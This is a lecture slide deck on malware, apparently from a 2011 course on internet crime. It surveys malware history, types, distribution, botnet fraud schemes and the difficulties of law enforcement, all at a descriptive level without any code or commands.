Add to collection(s) Add to saved
  1. Engineering & Technology
  2. Computer Science
  3. Information Security

Malware - T&T Software WWW Server

advertisement 
Internet Vulnerabilities &
Criminal Activities
Malware
3.2
9/26/2011
Malware
Malicious software designed to
gain access to information and/or
resources without the knowledge
or consent of the end user
Malware History
 1981
 1983
 1986
 1988
 1990
 1991
 1994
 1995
 1998
- First Apple II virus in the wild
- Fred Cohen coins term “virus”
- First PC virus
- Morris Internet worm
- First Polymorphic virus
- Virus Construction Set
- Good Times virus hoax
- First Macro Virus
- Back Oriface tool released
Malware History cont.
 1999 - Melissa virus / worm
 1999 - Tribal Flood Network - DDOS tool
 2001 - Code Red worm
 2001 - Nimda worm
 2003 - Slammer worm
 2004 - So Big & Sasser worms
 2007 - Storm worm / Zeus botnet tool
 2008 - Conficker worm
 2010 – Stuxnet – weaponized malware
Malware Trends
 Increasing complexity & sophistication
 Acceleration of the rate of release of
innovative tools & techniques
 Movement from viruses to worms to
kernel-level exploitations
Malware can be:
 “Proof of concept”
Created to prove it can be done
Not found outside of laboratory
environment
If code available, can be used by others
 “In the Wild.”
Found on computers in everyday use
Traditional Categories of Malware
 Virus
 Worm
 Malicious Mobile Code
 Backdoor
 Trojan Horse
 Rootkit
 Combination Malware – Malware “Cocktail”
Virus
 Infects a host file
 Self replicates
 Requires human interaction to
replicate
 Examples:
Michelangelo
Melissa
Worm
 Spreads across a network
 Does not require human interaction to
spread
 Self-replicating
 Examples:
Morris Worm
Code Red
Slammer
Malicious Mobile Code
 Lightweight program downloaded from
a remote source and executed locally
 Minimal human interaction
 Written in Javascript, VBScript,
ActiveX, or Java
 Example:
Cross Site Scripting
Backdoor
 Bypasses normal security controls
 Gives attacker access to user’s system
 Example:
Netcat
Back Oriface
Sub 7
Trojan Horse
 Program that disguises its hidden
malicious purpose
 Appears to be harmless game or
screensaver
 Used for spyware & backdoors
 Not self-replicating
Rootkit
 Replaces or modifies programs thts are
part of the operating system
 Two Levels
User-level
Kernel-level
 Examples
Universal Rootkit
Kernel Intrusion System
Combination Malware
 Uses a combination of various
techniques to increase effectiveness
 Examples:
Lion
Bugbear.B
Stuxnet
Malware Distribution
 Attachments
 E-mail and Instant Messaging
 Piggybacking
 Malware added to legitimate program
 Adware, spyware
 EULA - End User License Agreement
 Internet Worms
 Exploit security vulnerability
 Used to install backdoors
 Web Browser Exploit
 Malware added to legitimate web site
 Cross-site scripting & SQL Injection
 Visitors to web site may be infected
 Drive by malware
Malware Distribution cont.
 Hacking
 Too labor intensive for large crime operations
 May be used to compromise DNS server
 Affiliate Marketing
 Web site owner paid 8¢ to 50 ¢ per machine to
install malware on a visitor’s computer
 Mobile Devices
 Transfer via bluetooth
Malware Activity
 Adware
 Spyware
 Hijacker
 Toolbars
 Dialers
 Rogue Security Software
 Bots
Adware
 Displays ads on infected machine
 Ads format can be:
Pop-ups
Pop-under
Embedded in programs
On top web site ads
 More annoying than dangerous
Spyware
 Send information about infected computer to
someone, somewhere
 Web sites surfed
 Terms searched for
 Information from web forms
 Files downloaded
 Search hard drive for files installed
 E-mail address book
 Browser history
 Logon names, passwords, credit card numbers
 Any other personal information
Hijacker
 Takes control of web browser
Home page
Search engines
Search bar
Redirect sites
Prevent some sites from loading
 IE vulnerable
Toolbars
 Plug-ins to IE
Google
Yahoo
 Attempt to emulate legitimate toolbars
 Installed via underhanded means
Adware or Spyware
 Acts a keystroke logger
Dialers
 Alters modem connections and ISDN-
Cards
 Once installed, will dial 1-900 numbers
or other premium rate numbers
 Run up end-users phone bill & provide
revenue for criminal enterprise
 Targets MS Windows
Rogue Security Software
 Usually delivered via a trojan horse
 Uses social engineering techniques to get
user to install
 Fake warnings that computer is infected
 Fake video of machine crashing
 Disables anti-virus and anti-spyware
programs
 Alters computer system so the rogue
software cannot be removed
Bots
 Allows attacker remote access to a computer
 When end-user is online, computer contacts
Command & Control (C&C) site
 Bot will then perform what ever commands
received from the C&C
 Some things botnets are used for
 Distributed Denial of Service (DDoS) attacks
 Spam
 Hosting contraband such as child porn
 Other illegal fraud schemes
Weaponized Malware
 Attacks SCADA system
 Supervisory Control And Data Acquisition
 Causes physical damage
 SCADA systems control
 Dams
 Electrical grid
 Nuclear power plants
 Cyber War - The Aurora Project
 http://www.youtube.com/watch?v=rTkXgqK1l9A
More Malware Terminology
 Downloader
 Single line of code
 Payload from malware
 Instructs infect computer to download malware
from attacker’s server
 Drop
 Clandestine computer or service (E-mail)
 Collects information sent to it from infected
machines
 Blind Drop - well hidden, designed to run
attended
More Malware Terminology
cont.
 Exploit
 Code used to take advantage of a vulnerability in
software code or configuration
 Form-grabber
 A program that steal information submitted by a
user to a web site
 Packer
 Tool used to scramble and compress an .exe file
 Hides malicious nature of code
 Makes analysis of program more difficult
More Malware Terminology
cont.
 Redirect
 HTTP feature
 Used to forward someone from one web page to
another
 Done invisibly with malware
 Variant
 Malware produced from the same code base
 Different enough to require new signature for
detection by anti-virus software
Malware Sources
 Malware
 Can be programmed from scratch
 Less likely to be detected by anti-malware programs
 Can be purchased
 Malware tools
 Haxdoor, Torpig, Metafisher, Web Attacker
 Tools offered with other services
 Access to botnet, drop sites
 Tools derived from small stable base of existing
code
Frauds Involving Malware
 Advertising schemes
 Pay-per-view
 Pay-per-click (“Click Fraud”)
 Pay-per-install
 Banking fraud
 Identity theft
 Spam
 Denial-of-service attacks
 DoS extortion
Advertising Schemes
 Pay-per-view
Sell advertising space on controlled web
sites
Command botnet to “view” as many ads
as possible
May have ads download in the background
Fraudulent commissions generated
Advertising Schemes cont.
 Pay-per-click (“”Click Fraud”)
 Similar to Pay-per-view fraud
 Bots simulate clicks on ads
 Between 5% and 35% of all ad commissions may
be fraudulent
 Pay-per-install
 Commission paid every times advertisers
software is installed
 When installed, notification sent to advertiser
 Infected machines will be instructed to install
advertisers software
Banking Fraud
 Banks are a prime target of malware
 Malware can allows attacker to empty
victim’s bank account
 Example (September 2009)
 Rewrite online bank statements on the fly
 Covers up theft of funds
 Trojan horse
 Alters HTML code before browser displays
 Makes use of “Money Mules”
Identity Theft
 Phishing & key logging
 Recent increase in malware associated
with identity theft
 Information sent to drop site
Spam
 Bots used to send spam
 Also show dramatic rise
 Bots are available for rent for spam
purposes
 Spam sent can also contain malware
Denial of Service Attacks
 Botnet commanded to make requests
of a web site
 Web site may crash due to heavy
traffic
 Legitimate traffic blocked
 Threat of DoS attack can be used for
extortion
 Bots for rent for DoS attacks
Problems for Law Enforcement
 Anonymity
 Jurisdiction
 Attackers know how difficult international law
enforcement is
 Exploit the situation
 Target victims in one country from another country
 Have C&C site and drop site located in a third country
 Use multiple proxies to access C&C site and drop site
 Money gain quickly funneled through online bank
accounts and international money transfers
Other Issues
 Monetary Threshold
 Must reach a limit before prosecutor will take
case
 May be hard to prove exact amount of money
involved
 Cyber crimes may be considered a non-priority
 Virtual world emboldens individuals
 Less fear of getting caught
 Realization of difficulties in investigating crimes
 Easy money
Related documents
Cyber Security is everybody`s responsibility
Cyber Security is everybody`s responsibility
all
all
malware_02
malware_02
CuckooSandbox
CuckooSandbox
here - Michael Goffin
here - Michael Goffin
Cyber Security Awareness Day 2013 Web
Cyber Security Awareness Day 2013 Web
McAfee Web Gateway CxO presentation
McAfee Web Gateway CxO presentation
Topics in Email Security - Network Security Office
Topics in Email Security - Network Security Office
Windows 8x - CIIIWebSupport
Windows 8x - CIIIWebSupport
Here are the slides
Here are the slides
Chapter 3A,B,C
Chapter 3A,B,C
Exfiltration Framework
Exfiltration Framework
The Risks of Social Networking
The Risks of Social Networking
Web Audit Vulnerability
Web Audit Vulnerability
first_2014_-_yoon
first_2014_-_yoon
Safe(r) Web Browsing presentation
Safe(r) Web Browsing presentation
Download
advertisement